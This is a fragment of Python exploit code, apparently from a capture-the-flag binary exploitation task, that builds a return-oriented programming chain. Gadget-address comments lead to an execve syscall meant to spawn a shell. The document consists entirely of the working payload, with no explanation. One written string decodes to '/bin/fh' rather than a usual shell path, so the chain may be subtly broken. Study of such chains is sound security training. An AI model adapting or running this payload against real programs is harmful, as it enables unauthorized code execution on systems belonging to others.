payload = p64(0x40fffc)
#0x000000000040fffc: pop rax; ret 2; 
payload += p64(0x44d058)+p64(0x434db9)+"\x00"*2
# 0x0000000000434db9: xchg edi, eax; ret; 
payload += p64(0x40fffc)
# 0x000000000040fffc: pop rax; ret 2; 
payload += p64(0x6e69622f)+p64(0x433d01)+"\x00"*2
# 0x433d01: stosd dword ptr [rdi], eax ; retf
payload += p32(0x40fffc)+p32(0x33)
# 0x000000000040fffc: pop rax; ret 2; 
payload += p64(0x44d05c)+p64(0x434db9)+"\x00"*2
# 0x0000000000434db9: xchg edi, eax; ret; 
payload += p64(0x40fffc)
# 0x000000000040fffc: pop rax; ret 2; 
payload += p64(0x68662f)+p64(0x433d01)+"\x00"*2
# 0x433d01: stosd dword ptr [rdi], eax ; retf
payload += p32(0x40fffc)+p32(0x33)
# 0x000000000040fffc: pop rax; ret 2; 
payload += p64(0x0)+p64(0x4346b2)+"\x00"*2
# 0x4346b2: xchg edx, eax ; retf 0
payload += p32(0x410116)+p32(0x33)
# 0x0000000000410116: pop rsi; ret; 
payload += p64(0x0)+p64(0x40fffc)
# 0x000000000040fffc: pop rax; ret 2; 
payload += p64(0x44d058)+p64(0x434db9)+"\x00"*2
# 0x0000000000434db9: xchg edi, eax; ret; 
payload += p64(0x40fffc)
# 0x000000000040fffc: pop rax; ret 2; 
payload += p64(0x3b)+p64(0x4308db)+"\x00"*2
# 0x00000000004308db: syscall; 
payload += b''
